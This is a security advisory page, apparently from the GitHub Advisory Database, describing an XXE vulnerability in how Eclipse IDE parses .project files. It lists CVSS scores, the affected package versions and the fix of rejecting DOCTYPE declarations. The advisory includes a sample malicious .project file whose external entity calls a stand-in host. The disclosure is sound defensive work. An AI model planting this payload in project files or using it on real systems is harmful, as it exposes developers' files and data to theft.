Lucene search

K
githubGitHub Advisory DatabaseGHSA-J24H-XCPC-9JW8
HistoryNov 30, 2023 - 7:52 p.m.

Eclipse IDE XXE in eclipse.platform

2023-11-3019:52:54
GitHub Advisory Database
github.com
11
eclipse
xxe
vulnerability
xml
patches
sonarlint
pde
workaround
firewall
cwe-611
code analysis
security
gitlab
repository

CVSS3

5

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

AI Score

7.3

Confidence

High

EPSS

0.001

Percentile

16.0%

Impact

xml files like “.project” are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch).

Vulnerablility was found by static code analysis (SonarLint).

Example .project file:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE price [
<!ENTITY xxe SYSTEM "http://127.0.0.1:49416/evil">]>
<projectDescription>
	<name>p</name>
	<comment>&xxe;</comment>
</projectDescription>

Patches

Similar patches including junit test that shows the vulnerability have already applied to PDE (see https://github.com/eclipse-pde/eclipse.pde/pull/667). A solution to platform should be the same: just reject parsing any XML that contains any DOCTYPE.

Workarounds

No known workaround. User can only avoid to get/open any foreign files with eclipse. Firewall rules against loss of data (but not against XML bomb).

References

https://cwe.mitre.org/data/definitions/611.html
https://rules.sonarsource.com/java/RSPEC-2755
https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8 (Report for multiple projects affected)

Affected configurations

Vulners
Node
org.eclipse.jdtorg.eclipse.jdt.uiRange<3.30.0
OR
org.eclipse.platformorg.eclipse.urischemeRange<1.3.100
OR
org.eclipse.platformorg.eclipse.ui.workbenchRange<3.130.0
OR
org.eclipse.platformorg.eclipse.ui.ideRange<3.21.100
OR
org.eclipse.platformorg.eclipse.ui.formsRange<3.13.0
OR
org.eclipse.platformorg.eclipse.jfaceRange<3.31.0
OR
org.eclipse.platformorg.eclipse.platformRange<4.29.0
OR
org.eclipse.platformorg.eclipse.core.runtimeRange<3.29.0
VendorProductVersionCPE
org.eclipse.jdtorg.eclipse.jdt.ui*cpe:2.3:a:org.eclipse.jdt:org.eclipse.jdt.ui:*:*:*:*:*:*:*:*
org.eclipse.platformorg.eclipse.urischeme*cpe:2.3:a:org.eclipse.platform:org.eclipse.urischeme:*:*:*:*:*:*:*:*
org.eclipse.platformorg.eclipse.ui.workbench*cpe:2.3:a:org.eclipse.platform:org.eclipse.ui.workbench:*:*:*:*:*:*:*:*
org.eclipse.platformorg.eclipse.ui.ide*cpe:2.3:a:org.eclipse.platform:org.eclipse.ui.ide:*:*:*:*:*:*:*:*
org.eclipse.platformorg.eclipse.ui.forms*cpe:2.3:a:org.eclipse.platform:org.eclipse.ui.forms:*:*:*:*:*:*:*:*
org.eclipse.platformorg.eclipse.jface*cpe:2.3:a:org.eclipse.platform:org.eclipse.jface:*:*:*:*:*:*:*:*
org.eclipse.platformorg.eclipse.platform*cpe:2.3:a:org.eclipse.platform:org.eclipse.platform:*:*:*:*:*:*:*:*
org.eclipse.platformorg.eclipse.core.runtime*cpe:2.3:a:org.eclipse.platform:org.eclipse.core.runtime:*:*:*:*:*:*:*:*

References

CVSS3

5

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

AI Score

7.3

Confidence

High

EPSS

0.001

Percentile

16.0%